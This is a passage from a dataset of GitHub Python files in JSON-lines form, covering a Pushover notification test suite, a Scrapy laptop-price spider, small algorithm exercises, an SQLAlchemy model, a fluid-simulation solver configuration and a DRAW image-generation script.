NNew=int(args[2])\r\n Nhh=int(args[3])\r\n Nf=int(len(args)-4) \r\n \r\n arr_bb=[] \r\n for i in range(Nf):\r\n arr_bb.append(args[4+i])\r\n arr_bb=np.asarray(arr_bb,float)\r\n \r\n arr_b=arr_bb.copy() \r\n Nf=int(arr_b.size/NChan)\r\n arr_bZ=[]\r\n for l in range(NChan):\r\n arr_bZ.append(arr_b[0+Nf*l:Nf-NNew+Nf*l]) \r\n arr_bZ=np.asarray(arr_bZ,float)\r\n D=np.std(arr_bZ)\r\n arr_b=np.asarray(arr_bb,np.float16) \r\n NNew=int(NNew*1.1) \r\n while 1==1: \r\n hh=0\r\n ann=0\r\n arr_bbx=[]\r\n Nch=0\r\n Koef=np.zeros(Nhh,float)\r\n KoefA=np.zeros(Nhh,float)\r\n while hh0:\r\n KoefA[hh]=100*scp.spearmanr(mm1,mm2)[0]\r\n else:\r\n KoefA[hh]=0\r\n arr_bbx.append(arr_bbbxxx) \r\n hh=hh+1\r\n else:\r\n hh=Nhh+2\r\n if hh0:\r\n for l in range(NChan):\r\n arr_b[Nf-NNew+Nf*l:Nf+Nf*l]=arr_bbx[Nf-NNew+Nf*l:Nf+Nf*l,Nch].copy() \r\n arr_b=filterFourierQ(arr_b,arr_b,NNew,NChan)\r\n return arr_b\r\n\r\nif __name__ == '__main__':\r\n RALf1FiltrQ(sys.argv)","repo_name":"VadimChornyy/RALF1","sub_path":"RALf1FiltrVIDY.py","file_name":"RALf1FiltrVIDY.py","file_ext":"py","file_size_in_byte":15750,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"15224792547","text":"import os\nfrom unittest import mock\n\nimport requests\nimport pytest\nfrom json import dumps\nfrom apprise.plugins.NotifyPushover import PushoverPriority, NotifyPushover\nimport apprise\nfrom helpers import AppriseURLTester\n\n# Disable logging for a cleaner testing output\nimport logging\nlogging.disable(logging.CRITICAL)\n\n# Attachment Directory\nTEST_VAR_DIR = os.path.join(os.path.dirname(__file__), 'var')\n\n# Our Testing URLs\napprise_url_tests = (\n ('pover://', {\n 'instance': TypeError,\n }),\n # bad url\n ('pover://:@/', {\n 'instance': TypeError,\n }),\n # APIkey; no user\n ('pover://%s' % ('a' * 30), {\n 'instance': TypeError,\n }),\n # API Key + custom sound setting\n ('pover://%s@%s?sound=mysound' % ('u' * 30, 'a' * 30), {\n 'instance': NotifyPushover,\n }),\n # API Key + valid alternate sound picked\n ('pover://%s@%s?sound=spacealarm' % ('u' * 30, 'a' * 30), {\n 'instance': NotifyPushover,\n }),\n # API Key + valid url_title with url\n ('pover://%s@%s?url=my-url&url_title=title' % ('u' * 30, 'a' * 30), {\n 'instance': NotifyPushover,\n }),\n # API Key + Valid User\n ('pover://%s@%s' % ('u' * 30, 'a' * 30), {\n 'instance': NotifyPushover,\n # don't include an image by default\n 'include_image': False,\n }),\n # API Key + Valid User + 1 Device\n ('pover://%s@%s/DEVICE' % ('u' * 30, 'a' * 30), {\n 'instance': NotifyPushover,\n }),\n # API Key + Valid User + 1 Device (via to=)\n ('pover://%s@%s?to=DEVICE' % ('u' * 30, 'a' * 30), {\n 'instance': NotifyPushover,\n }),\n # API Key + Valid User + 2 Devices\n ('pover://%s@%s/DEVICE1/Device-with-dash/' % ('u' * 30, 'a' * 30), {\n 'instance': NotifyPushover,\n\n # Our expected url(privacy=True) startswith() response:\n 'privacy_url': 'pover://u...u@a...a',\n }),\n # API Key + Valid User + invalid device\n ('pover://%s@%s/%s/' % ('u' * 30, 'a' * 30, 'd' * 30), {\n 'instance': NotifyPushover,\n # Notify will return False since there is a bad device in our list\n 'response': False,\n }),\n # API Key + Valid User + device + invalid device\n ('pover://%s@%s/DEVICE1/%s/' % ('u' * 30, 'a' * 30, 'd' * 30), {\n 'instance': NotifyPushover,\n # Notify will return False since there is a bad device in our list\n 'response': False,\n }),\n # API Key + priority setting\n ('pover://%s@%s?priority=high' % ('u' * 30, 'a' * 30), {\n 'instance': NotifyPushover,\n }),\n # API Key + priority setting + html mode\n ('pover://%s@%s?priority=high&format=html' % ('u' * 30, 'a' * 30), {\n 'instance': NotifyPushover,\n }),\n # API Key + priority setting + markdown mode\n ('pover://%s@%s?priority=high&format=markdown' % ('u' * 30, 'a' * 30), {\n 'instance': NotifyPushover,\n }),\n # API Key + invalid priority setting\n ('pover://%s@%s?priority=invalid' % ('u' * 30, 'a' * 30), {\n 'instance': NotifyPushover,\n }),\n # API Key + emergency(2) priority setting\n ('pover://%s@%s?priority=emergency' % ('u' * 30, 'a' * 30), {\n 'instance': NotifyPushover,\n }),\n # API Key + emergency(2) priority setting (via numeric value\n ('pover://%s@%s?priority=2' % ('u' * 30, 'a' * 30), {\n 'instance': NotifyPushover,\n }),\n # API Key + emergency priority setting with retry and expire\n ('pover://%s@%s?priority=emergency&%s&%s' % ('u' * 30,\n 'a' * 30,\n 'retry=30',\n 'expire=300'), {\n 'instance': NotifyPushover,\n }),\n # API Key + emergency priority setting with text retry\n ('pover://%s@%s?priority=emergency&%s&%s' % ('u' * 30,\n 'a' * 30,\n 'retry=invalid',\n 'expire=300'), {\n 'instance': NotifyPushover,\n }),\n # API Key + emergency priority setting with text expire\n ('pover://%s@%s?priority=emergency&%s&%s' % ('u' * 30,\n 'a' * 30,\n 'retry=30',\n 'expire=invalid'), {\n 'instance': NotifyPushover,\n }),\n # API Key + emergency priority setting with invalid expire\n ('pover://%s@%s?priority=emergency&%s' % ('u' * 30,\n 'a' * 30,\n 'expire=100000'), {\n 'instance': TypeError,\n }),\n # API Key + emergency priority setting with invalid retry\n ('pover://%s@%s?priority=emergency&%s' % ('u' * 30,\n 'a' * 30,\n 'retry=15'), {\n 'instance': TypeError,\n }),\n # API Key + priority setting (empty)\n ('pover://%s@%s?priority=' % ('u' * 30, 'a' * 30), {\n 'instance': NotifyPushover,\n }),\n ('pover://%s@%s' % ('u' * 30, 'a' * 30), {\n 'instance': NotifyPushover,\n # force a failure\n 'response': False,\n 'requests_response_code': requests.codes.internal_server_error,\n }),\n ('pover://%s@%s' % ('u' * 30, 'a' * 30), {\n 'instance': NotifyPushover,\n # throw a bizzare code forcing us to fail to look it up\n 'response': False,\n 'requests_response_code': 999,\n }),\n ('pover://%s@%s' % ('u' * 30, 'a' * 30), {\n 'instance': NotifyPushover,\n # Throws a series of connection and transfer exceptions when this flag\n # is set and tests that we gracfully handle them\n 'test_requests_exceptions': True,\n }),\n)\n\n\ndef test_plugin_pushover_urls():\n \"\"\"\n NotifyPushover() Apprise URLs\n\n \"\"\"\n\n # Run our general tests\n AppriseURLTester(tests=apprise_url_tests).run_all()\n\n\n@mock.patch('requests.post')\ndef test_plugin_pushover_attachments(mock_post, tmpdir):\n \"\"\"\n NotifyPushover() Attachment Checks\n\n \"\"\"\n\n # Initialize some generic (but valid) tokens\n user_key = 'u' * 30\n api_token = 'a' * 30\n\n # Prepare a good response\n response = mock.Mock()\n response.content = dumps(\n {\"status\": 1, \"request\": \"647d2300-702c-4b38-8b2f-d56326ae460b\"})\n response.status_code = requests.codes.ok\n\n # Prepare a bad response\n bad_response = mock.Mock()\n response.content = dumps(\n {\"status\": 1, \"request\": \"647d2300-702c-4b38-8b2f-d56326ae460b\"})\n bad_response.status_code = requests.codes.internal_server_error\n\n # Assign our good response\n mock_post.return_value = response\n\n # prepare our attachment\n attach = apprise.AppriseAttachment(\n os.path.join(TEST_VAR_DIR, 'apprise-test.gif'))\n\n # Instantiate our object\n obj = apprise.Apprise.instantiate(\n 'pover://{}@{}/'.format(user_key, api_token))\n assert isinstance(obj, NotifyPushover)\n\n # Test our attachment\n assert obj.notify(body=\"test\", attach=attach) is True\n\n # Test our call count\n assert mock_post.call_count == 1\n assert mock_post.call_args_list[0][0][0] == \\\n 'https://api.pushover.net/1/messages.json'\n\n # Reset our mock object for multiple tests\n mock_post.reset_mock()\n\n # Test multiple attachments\n assert attach.add(os.path.join(TEST_VAR_DIR, 'apprise-test.gif'))\n assert obj.notify(body=\"test\", attach=attach) is True\n\n # Test our call count\n assert mock_post.call_count == 2\n assert mock_post.call_args_list[0][0][0] == \\\n 'https://api.pushover.net/1/messages.json'\n assert mock_post.call_args_list[1][0][0] == \\\n 'https://api.pushover.net/1/messages.json'\n\n # Reset our mock object for multiple tests\n mock_post.reset_mock()\n\n image = tmpdir.mkdir(\"pover_image\").join(\"test.jpg\")\n image.write('a' * NotifyPushover.attach_max_size_bytes)\n\n attach = apprise.AppriseAttachment.instantiate(str(image))\n assert obj.notify(body=\"test\", attach=attach) is True\n\n # Test our call count\n assert mock_post.call_count == 1\n assert mock_post.call_args_list[0][0][0] == \\\n 'https://api.pushover.net/1/messages.json'\n\n # Reset our mock object for multiple tests\n mock_post.reset_mock()\n\n # Add 1 more byte to the file (putting it over the limit)\n image.write(\n 'a' * (NotifyPushover.attach_max_size_bytes + 1))\n\n attach = apprise.AppriseAttachment.instantiate(str(image))\n assert obj.notify(body=\"test\", attach=attach) is False\n\n # Test our call count\n assert mock_post.call_count == 0\n\n # Test case when file is missing\n attach = apprise.AppriseAttachment.instantiate(\n 'file://{}?cache=False'.format(str(image)))\n os.unlink(str(image))\n assert obj.notify(\n body='body', title='title', attach=attach) is False\n\n # Test our call count\n assert mock_post.call_count == 0\n\n # Test unsuported files:\n image = tmpdir.mkdir(\"pover_unsupported\").join(\"test.doc\")\n image.write('a' * 256)\n attach = apprise.AppriseAttachment.instantiate(str(image))\n\n # Content is silently ignored\n assert obj.notify(body=\"test\", attach=attach) is True\n\n # prepare our attachment\n attach = apprise.AppriseAttachment(\n os.path.join(TEST_VAR_DIR, 'apprise-test.gif'))\n\n # Throw an exception on the first call to requests.post()\n for side_effect in (requests.RequestException(), OSError(), bad_response):\n mock_post.side_effect = [side_effect, side_effect]\n\n # We'll fail now because of our error handling\n assert obj.send(body=\"test\", attach=attach) is False\n\n # Same case without an attachment\n assert obj.send(body=\"test\") is False\n\n\n@mock.patch('requests.post')\ndef test_plugin_pushover_edge_cases(mock_post):\n \"\"\"\n NotifyPushover() Edge Cases\n\n \"\"\"\n\n # No token\n with pytest.raises(TypeError):\n NotifyPushover(token=None)\n\n # Initialize some generic (but valid) tokens\n token = 'a' * 30\n user_key = 'u' * 30\n\n invalid_device = 'd' * 35\n\n # Support strings\n devices = 'device1,device2,,,,%s' % invalid_device\n\n # Prepare Mock\n mock_post.return_value = requests.Request()\n mock_post.return_value.status_code = requests.codes.ok\n\n # No webhook id specified\n with pytest.raises(TypeError):\n NotifyPushover(user_key=user_key, webhook_id=None)\n\n obj = NotifyPushover(\n user_key=user_key, token=token, targets=devices)\n assert isinstance(obj, NotifyPushover) is True\n # Our invalid device is ignored\n assert len(obj.targets) == 2\n\n # We notify the 2 devices loaded\n assert obj.notify(\n body='body', title='title',\n notify_type=apprise.NotifyType.INFO) is True\n\n obj = NotifyPushover(user_key=user_key, token=token)\n assert isinstance(obj, NotifyPushover) is True\n # Default is to send to all devices, so there will be a\n # device defined here\n assert len(obj.targets) == 1\n\n # This call succeeds because all of the devices are valid\n assert obj.notify(\n body='body', title='title',\n notify_type=apprise.NotifyType.INFO) is True\n\n obj = NotifyPushover(\n user_key=user_key, token=token, targets=set())\n assert isinstance(obj, NotifyPushover) is True\n # Default is to send to all devices, so there will be a\n # device defined here\n assert len(obj.targets) == 1\n\n # No User Key specified\n with pytest.raises(TypeError):\n NotifyPushover(user_key=None, token=\"abcd\")\n\n # No Access Token specified\n with pytest.raises(TypeError):\n NotifyPushover(user_key=\"abcd\", token=None)\n\n with pytest.raises(TypeError):\n NotifyPushover(user_key=\"abcd\", token=\" \")\n\n\n@mock.patch('requests.post')\ndef test_plugin_pushover_config_files(mock_post):\n \"\"\"\n NotifyPushover() Config File Cases\n \"\"\"\n content = \"\"\"\n urls:\n - pover://USER@TOKEN:\n - priority: -2\n tag: pushover_int low\n - priority: \"-2\"\n tag: pushover_str_int low\n - priority: low\n tag: pushover_str low\n\n # This will take on normal (default) priority\n - priority: invalid\n tag: pushover_invalid\n\n - pover://USER2@TOKEN2:\n - priority: 2\n tag: pushover_int emerg\n - priority: \"2\"\n tag: pushover_str_int emerg\n - priority: emergency\n tag: pushover_str emerg\n \"\"\"\n\n # Prepare Mock\n mock_post.return_value = requests.Request()\n mock_post.return_value.status_code = requests.codes.ok\n\n # Create ourselves a config object\n ac = apprise.AppriseConfig()\n assert ac.add_config(content=content) is True\n\n aobj = apprise.Apprise()\n\n # Add our configuration\n aobj.add(ac)\n\n # We should be able to read our 7 servers from that\n # 3x low\n # 3x emerg\n # 1x invalid (so takes on normal priority)\n assert len(ac.servers()) == 7\n assert len(aobj) == 7\n assert len([x for x in aobj.find(tag='low')]) == 3\n for s in aobj.find(tag='low'):\n assert s.priority == PushoverPriority.LOW\n\n assert len([x for x in aobj.find(tag='emerg')]) == 3\n for s in aobj.find(tag='emerg'):\n assert s.priority == PushoverPriority.EMERGENCY\n\n assert len([x for x in aobj.find(tag='pushover_str')]) == 2\n assert len([x for x in aobj.find(tag='pushover_str_int')]) == 2\n assert len([x for x in aobj.find(tag='pushover_int')]) == 2\n\n assert len([x for x in aobj.find(tag='pushover_invalid')]) == 1\n assert next(aobj.find(tag='pushover_invalid')).priority == \\\n PushoverPriority.NORMAL\n\n # Notifications work\n # We test 'pushover_str_int' and 'low' which only matches 1 end point\n assert aobj.notify(\n title=\"title\", body=\"body\", tag=[('pushover_str_int', 'low')]) is True\n\n # Notify everything loaded\n assert aobj.notify(title=\"title\", body=\"body\") is True\n","repo_name":"caronc/apprise","sub_path":"test/test_plugin_pushover.py","file_name":"test_plugin_pushover.py","file_ext":"py","file_size_in_byte":13967,"program_lang":"python","lang":"en","doc_type":"code","stars":8936,"dataset":"github-code","pt":"21"} +{"seq_id":"24575270032","text":"import scrapy\nfrom modulnakr.items import ModulnakrItem\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\nfrom selenium.webdriver.support import expected_conditions\nfrom selenium.webdriver.common.by import By\nfrom modulnakr.SeleniumRequest import SeleniumRequest\n\nclass EkSpider(scrapy.Spider):\n name = \"ek\"\n allowed_domains = [\"ek.ua\"]\n start_urls = [\"https://ek.ua/ua/list/30/\"]\n\n driver = webdriver.Chrome('/path/to/chromedriver')\n\n def start_requests(self):\n for url in self.start_urls:\n yield SeleniumRequest(\n url=url,\n callback=self.parse,\n wait_time=10,\n wait_until=expected_conditions.element_to_be_clickable(\n (By.CSS_SELECTOR,\n \".model-shop-name .sn-div\")\n ),\n )\n\n def parse(self, response):\n self.driver.get(response.url)\n self.driver.maximize_window()\n\n soup = BeautifulSoup(response.text, 'html.parser')\n\n laptops = soup.find(id=\"list_form1\").find_all(class_=\"model-short-div list-item--goods\")\n\n for laptop in laptops:\n model = laptop.find(class_=\"u\").getText()\n img_url = laptop.find(\"img\")[\"src\"]\n\n price = laptop.find('td', class_=\"model-shop-price\").find(\"a\").getText()\n\n print(price)\n \n\n configs = laptop.find(class_=\"model-short-info\").findAll(\"u\")\n\n i = 1\n for config in configs:\n config = config.getText()\n yield ModulnakrItem(\n model=model,\n img_url=img_url,\n price=price,\n config=config,\n )\n\n i += 1\n if i > 7:\n break\n\n def close(self, reason):\n self.driver.quit()\n","repo_name":"Heesemachine/Scrapping","sub_path":"modulnakr/modulnakr/spiders/ek.py","file_name":"ek.py","file_ext":"py","file_size_in_byte":1865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"45072526821","text":"N, K = input().split()\nN = int(N)\nK = float(K)\nfence = []\n\ntry:\n while len(fence) < N:\n fence += [float(a) for a in input().split()]\nexcept EOFError:\n pass\n\nfence.sort()\n\nfirst = 0\nnext = 1\nmax_num = 0\n\nfirst = 0\nnext = 1\nlength = 1\n\n# here i play with indexes in order to not go over already compared fields\nwhile first < N:\n while next < N - first:\n if fence[next] - fence[first] <= K:\n length += 1\n next += 1\n else:\n break\n\n if length > max_num:\n max_num = length\n\n length -= 1\n first += 1\n\nprint(max_num)\n","repo_name":"Loosper/algorithms","sub_path":"lesson_1/fence.py","file_name":"fence.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1147288081","text":"n = int(input())\nvalues = list(map(int,input().split()))\nop = list(map(int,input().split()))\nmax_val = -1e9\nmin_val = 1e9\n\ndef dfs(depth, result, plus, minus, multiply, divide):\n global max_val, min_val\n if depth == n:\n max_val = max(result, max_val)\n min_val = min(result, min_val)\n return \n if plus:\n dfs(depth+1, result+values[depth], plus-1, minus, multiply, divide)\n if minus:\n dfs(depth+1, result-values[depth], plus, minus-1, multiply, divide)\n if multiply:\n dfs(depth+1, result*values[depth], plus, minus, multiply-1, divide)\n if divide:\n if result < 0: #음수라면\n dfs(depth+1, -(-(result)//values[depth]), plus, minus, multiply, divide-1)\n else:\n dfs(depth+1, result//values[depth] , plus, minus, multiply, divide-1)\n\ndfs(1, values[0], op[0], op[1], op[2], op[3])\nprint(max_val)\nprint(min_val)","repo_name":"julia0926/TIL_Algo","sub_path":"Study/Backjoon/백트래킹/14888.py","file_name":"14888.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11439125862","text":"import os\nimport datetime\n\nfrom server import db, app\n\n\nclass Table(db.Model):\n __table_args__ = (db.UniqueConstraint('name_id', 'ver'), )\n id = db.Column(db.Integer, autoincrement=True, primary_key=True)\n name_id = db.Column(db.Integer, db.ForeignKey('table_name.id'), nullable=False)\n ver = db.Column(db.Integer, nullable=False, default=1)\n time = db.Column(db.DateTime, default=datetime.datetime.utcnow)\n id_col = db.Column(db.String(10), default='id')\n y_col = db.Column(db.String(10))\n y_col_id = db.Column(db.Integer, default=-1)\n memo = db.Column(db.String(320), default='')\n price0 = db.Column(db.Numeric(10, 2), default=.01)\n price1 = db.Column(db.Numeric(10, 2), default=.01)\n price2 = db.Column(db.Numeric(10, 2), default=.01)\n score = db.Column(db.Float)\n # name backref from TableName\n\n def get_fate_path(self):\n return 't%d_v%d' % (self.name_id, self.ver)\n\n def get_local_path(self):\n path = 'u%d_t%d_v%d' % (self.name.uid, self.name_id, self.ver)\n return os.path.join(app.config['UPLOAD_FOLDER'], path)\n","repo_name":"cleanerleon/FDP_SERVER","sub_path":"server/model/Table.py","file_name":"Table.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38054919297","text":"# -*- coding: utf-8 -*-\nfrom abc import ABCMeta, abstractmethod\nimport os\nimport re\n\n\nclass GraphFactory(object):\n def __init__(self, graphInfo):\n self.graphInfo = graphInfo\n\n def analysisGraphPath(self):\n # if isinstance(list, self.graphInfo):\n # graphAly = GraphListAly()\n # elif\n if os.path.isfile(self.graphInfo):\n graphAly = GraphPathAly(self.graphInfo)\n elif isinstance(self.graphInfo, str):\n graphAly = GraphStrAly(self.graphInfo)\n else:\n graphAly = None\n return graphAly\n\n\nclass GraphAnalysis(object):\n __metaclass__ = ABCMeta\n\n def __init__(self):\n self.graphInfo = None\n pass\n\n @abstractmethod\n def alyGraphInput(self):\n pass\n\n @staticmethod\n def getRouteList(line):\n # return [(graphName, routes)]\n # 解析输入的地图语句\n graphs = []\n for graph in line.split(';'):\n if graph.strip() == '':\n continue\n try:\n name, routes = graph.split(':')\n except:\n routes = graph\n name = None\n graphs.append((name, routes))\n return graphs\n\n\nclass GraphStrAly(GraphAnalysis):\n def __init__(self, graphInfo):\n self.graphInfo = graphInfo\n self.graphList = []\n\n def alyGraphInput(self):\n # 解析地图\n # for graph in self.graphInfo.split(';'):\n # name, routes = graph.split(':')\n # self.graphList.append((name, routes))\n # return self.graphList\n return self.getRouteList(self.graphInfo)\n\nclass GraphListAly(GraphAnalysis):\n def __init__(self, graphInfo):\n self.graphInfo = graphInfo\n self.graphList = []\n\n def alyGraphInput(self):\n return self.graphList\n\n\nclass GraphPathAly(GraphAnalysis):\n def __init__(self, graphInfo):\n self.graphInfo = graphInfo\n self.graphList = []\n\n def alyGraphInput(self):\n with open(self.graphInfo) as f:\n for line in f:\n # 解析地图\n self.graphList.extend(self.getRouteList(line))\n\n return self.graphList\n","repo_name":"Gwen106728/Trains","sub_path":"src/GraphInfoAly.py","file_name":"GraphInfoAly.py","file_ext":"py","file_size_in_byte":2186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15570901302","text":"def split_var_lead(dat):\n \"\"\"\n Data split into lead times and variables for all X values data, excludes first lead_time as it is aquivalent to forecast_date\nArgs:\n dat(list): list of all 6 variables and their data including predictions and truth\n \n \nReturns: \n list: Nested list of lenght 6x31 with X values for all 6 variables and all 31 lead_times\n list: Nested list of lenght 6x31 with y values for all 6 variables and all 31 lead_times\n \"\"\"\n var_names = [\"u10\", \"v10\", \"t2m\", \"t850\", \"z500\", \"ws10\"]\n dat_X_lead_u10 = [] # list(31) of u10 with different lead times\n dat_X_lead_v10 = []\n dat_X_lead_t2m = []\n dat_X_lead_t850 = []\n dat_X_lead_z500 = []\n dat_X_lead_ws10 = []\n dat_X_lead_all = [\n dat_X_lead_u10,\n dat_X_lead_v10,\n dat_X_lead_t2m,\n dat_X_lead_t850,\n dat_X_lead_z500,\n dat_X_lead_ws10\n ] # List of all 5 X - variables and their lead times\n dat_y_lead_u10 = [] # list(31) of u10 ground truth values with different lead_times\n dat_y_lead_v10 = []\n dat_y_lead_t2m = []\n dat_y_lead_t850 = []\n dat_y_lead_z500 = []\n dat_y_lead_ws10 = []\n dat_y_lead_all = [\n dat_y_lead_u10,\n dat_y_lead_v10,\n dat_y_lead_t2m,\n dat_y_lead_t850,\n dat_y_lead_z500,\n dat_y_lead_ws10\n ]\n for lead in range(1, 32):\n for var in range(6):\n dat_X_lead_all[var].append(\n dat[var][list(dat[var].data_vars.keys())[0]].isel(lead_time=lead)\n )\n dat_y_lead_all[var].append(\n dat[var][list(dat[var].data_vars.keys())[1]].isel(lead_time=lead)\n )\n return dat_X_lead_all, dat_y_lead_all\n\n\ndef split_var_lead_one(dat):\n \"\"\"\n Return 31 datasets one for each relevant lead_time\n \"\"\"\n dat_split_X = []\n dat_split_y = []\n for lead_time in range(1, 32):\n dat_split_X.append(dat[list(dat.data_vars.keys())[0]].isel(lead_time=lead_time))\n dat_split_y.append(dat[list(dat.data_vars.keys())[1]].isel(lead_time=lead_time))\n return dat_split_X, dat_split_y","repo_name":"cleveryangcong/Bachelor_Thesis","sub_path":"src/utils/data_split.py","file_name":"data_split.py","file_ext":"py","file_size_in_byte":2102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6825652038","text":"from snek5000.info import InfoSolverMake\nfrom snek5000.solvers.kth import SimulKTH\n\n\nclass InfoSolverPhill(InfoSolverMake):\n \"\"\"Contain the information on a :class:`eturb.solvers.abl.Simul`\n instance.\n\n .. todo::\n\n Move Output info to :class:`InfoSolverNek` and only override it in\n :class:`InfoSolverABL`.\n\n \"\"\"\n\n def _init_root(self):\n from . import short_name\n\n super()._init_root()\n self.module_name = \"phill.solver\"\n self.class_name = \"Simul\"\n self.short_name = short_name\n\n self.classes.Output.module_name = \"phill.output\"\n self.classes.Output.class_name = \"OutputPhill\"\n\n\nclass SimulPhill(SimulKTH):\n \"\"\"A solver which compiles and runs using a Snakefile.\"\"\"\n\n InfoSolver = InfoSolverPhill\n\n @classmethod\n def create_default_params(cls):\n \"\"\"Set default values of parameters as given in reference\n implementation.\n\n \"\"\"\n params = super().create_default_params()\n\n params.nek.velocity._set_attrib(\"advection\", True)\n\n # Set par file parameters\n # ------------------------\n # Alternative can be to add phill.par to the current directory and\n # Synchronize baseline parameters as follows:\n # -----------------------------------------------------------------\n # primary_par_file = get_root() / \"phill.par\"\n # if mpi.rank == 0:\n # logger.info(f\"Reading baseline parameters from {primary_par_file}\")\n #\n # params.nek._read_par(primary_par_file)\n\n # https://github.com/KTH-Nek5000/KTH_Examples/blob/master/phill_STAT/phill.par\n general = params.nek.general\n general.stop_at = \"num_steps\"\n general.num_steps = 20\n general.dt = -2e-4\n general.time_stepper = \"bdf3\"\n general.variable_dt = False\n general.target_cfl = 0.3\n general.write_control = \"timestep\"\n general.write_interval = 100\n general.dealiasing = True\n general.filtering = \"explicit\"\n general.filter_weight = 0.02\n general.filter_cutoff_ratio = 0.67\n\n params.nek.problemtype.stress_formulation = False\n params.nek.problemtype.variable_properties = False\n\n params.nek.pressure.residual_tol = params.nek.velocity.residual_tol = 1e-8\n params.nek.pressure.residual_proj = params.nek.velocity.residual_proj = 1e-8\n params.nek.velocity.density = 1.0\n params.nek.velocity.viscosity = -700\n\n # User parameters for KTH framework\n params.nek.stat.av_step = 10\n params.nek.stat.io_step = 50\n\n # Set box file parameters\n # -----------------------\n # https://github.com/KTH-Nek5000/KTH_Examples/blob/master/phill_STAT/phill.box\n oper = params.oper\n # logger.info(oper._doc)\n\n oper.dim = 3\n oper.scalars = 1\n oper.nx = 22\n oper.ny = 16\n oper.nz = 19\n\n oper.Lx = oper.Ly = oper.Lz = 1.0\n oper.boundary = [\"P\", \"P\", \"W\", \"W\", \"P\", \"P\"]\n\n # Set SIZE file parameters\n # ------------------------\n # https://github.com/KTH-Nek5000/KTH_Examples/blob/master/phill_STAT/SIZE\n # Basic\n # logger.info(oper.elem._doc)\n # logger.info(oper.max._doc)\n # logger.info(oper.misc._doc)\n\n oper.elem.order = 6 # lx1\n oper.elem.coef_dealiasing = 2 / 3 # lxd\n oper.elem.staggered = True # Pn Pn-2\n\n # lelg calculated automatically\n oper.nproc_min = 8 # lpmin\n oper.nproc_max = 32 # lpmax\n\n oper.misc.fast_diag = False\n return params\n\n\nSimul = SimulPhill\n","repo_name":"snek5000/snek5000-phill","sub_path":"src/phill/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":3637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42051675656","text":"import os, sys, fnmatch\n\nignore = ['processing.js']\ndef get_js_files(path):\n js = []\n for path, dirs, files in os.walk(path):\n for file in files:\n if not file in ignore and fnmatch.fnmatch(file.lower(), r'*.js'):\n js.append(os.path.join(path, file))\n return js\n\ntarget = r'*PACK-HERE*'\ndef get_main_file(js_files):\n for dot_js in js_files:\n FILE = open(dot_js, 'r')\n for line in FILE.readlines():\n if fnmatch.fnmatch(line, target):\n return dot_js\n FILE.close()\n\ndef build(main, files, output):\n IN = open(main, 'r')\n OUT = open(output, 'w')\n\n for in_line in IN.readlines():\n if fnmatch.fnmatch(in_line, target):\n for file in files:\n FILE = open(file, 'r')\n for line in FILE.readlines():\n OUT.write(line)\n FILE.close()\n else:\n OUT.write(in_line)\n\n OUT.close()\n IN.close()\n \nif __name__ == '__main__':\n files= get_js_files(sys.path[0])\n \n main= get_main_file(files)\n files = [x for x in files if x != main]\n\n outfile = os.path.join(sys.path[0],'build','AIScript.js')\n \n build(main, files, outfile)\n","repo_name":"joshbyrom/AIScript","sub_path":"build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"4889944354","text":"import argparse\n\nimport torch\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport torchvision.utils as vutils\nimport time\n\nfrom draw_model import DRAWModel\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-load_path', required=True, help='Checkpoint to load path from')\nparser.add_argument('-num_output', default=36, help='Number of generated outputs')\nparser.add_argument('-t', default=None, help='Number of glimpses.')\nargs = parser.parse_args()\n\n# Load the checkpoint file.\nstate_dict = torch.load(args.load_path)\n\n# Set the device to run on: GPU or CPU.\ndevice = torch.device(\"cuda:0\" if(torch.cuda.is_available()) else \"cpu\")\n# Get the 'params' dictionary from the loaded state_dict.\nparams = state_dict['params']\n\n# Set the number of glimpses.\n# Best to just use the same value which was used for training.\nparams['T'] = int(args.t) if(args.t) else params['T']\n\n# Load the model\nmodel = DRAWModel(params).to(device)\n# Load the trained parameters.\nmodel.load_state_dict(state_dict['model'])\nprint('\\n')\nprint(model)\n\nstart_time = time.time()\nprint('*'*25)\nprint(\"Generating Image...\")\n# Generate images.\nwith torch.no_grad():\n x = model.generate(int(args.num_output))\n\ntime_elapsed = time.time() - start_time\nprint('\\nDONE!')\nprint('Time taken to generate image: %.2fs' % (time_elapsed))\n\nprint('\\nSaving generated image...')\nfig = plt.figure(figsize=(int(np.sqrt(int(args.num_output)))*2, int(np.sqrt(int(args.num_output)))*2))\nplt.axis(\"off\")\nplt.imshow(np.transpose(vutils.make_grid(\n x[-1], nrow=int(np.sqrt(int(args.num_output))), padding=1, normalize=True, pad_value=1).cpu(), (1, 2, 0)))\nplt.savefig(\"Generated_Image\")\nplt.close('all')\n\n# Create animation for the generation.\nfig = plt.figure(figsize=(int(np.sqrt(int(args.num_output)))*2, int(np.sqrt(int(args.num_output)))*2))\nplt.axis(\"off\")\nims = [[plt.imshow(np.transpose(i,(1,2,0)), animated=True)] for i in x]\nanim = animation.ArtistAnimation(fig, ims, interval=200, repeat_delay=2000, blit=True)\nanim.save('draw_generate.gif', dpi=100, writer='imagemagick')\nprint('DONE!')\nprint('-'*50)\nplt.show()","repo_name":"Natsu6767/Generating-Devanagari-Using-DRAW","sub_path":"generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":2128,"program_lang":"python","lang":"en","doc_type":"code","stars":88,"dataset":"github-code","pt":"21"} +{"seq_id":"19433641689","text":"from flask import Flask 